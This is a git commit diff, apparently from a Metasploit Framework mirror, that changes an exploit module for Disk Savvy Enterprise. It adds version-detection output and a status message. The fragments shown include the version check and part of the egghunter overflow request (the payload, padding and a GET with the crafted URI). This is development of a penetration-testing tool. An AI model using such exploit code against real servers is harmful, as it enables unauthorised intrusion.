1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-05 14:57:30 +01:00

Increase output

This commit is contained in:
Gabor Seljan 2017-01-21 10:51:58 +01:00
parent e3043b0889
commit bda464fd6b

View File

@ -77,9 +77,12 @@ class MetasploitModule < Msf::Exploit::Remote
)
if res && res.code == 200
if res.body =~ /Disk Savvy Enterprise v9\.(1|3)\.14/
return Exploit::CheckCode::Appears
elsif res.body =~ /Disk Savvy Enterprise/
version = res.body[/Disk Savvy Enterprise v[^<]*/]
if version
vprint_status("Version detected: #{version}")
if version =~ /9\.(1|3)\.14/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Detected
end
else
@ -115,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
fail_with(Failure::NoTarget, 'No matching target')
end
print_status("Selected Target: #{mytarget.name}")
print_status("Selected target: #{mytarget.name}")
end
eggoptions = {
@ -137,6 +140,8 @@ class MetasploitModule < Msf::Exploit::Remote
sploit << hunter
sploit << rand_text_alpha(4500)
print_status('Sending malicious request...')
send_request_cgi(
'method' => 'GET',
'uri' => sploit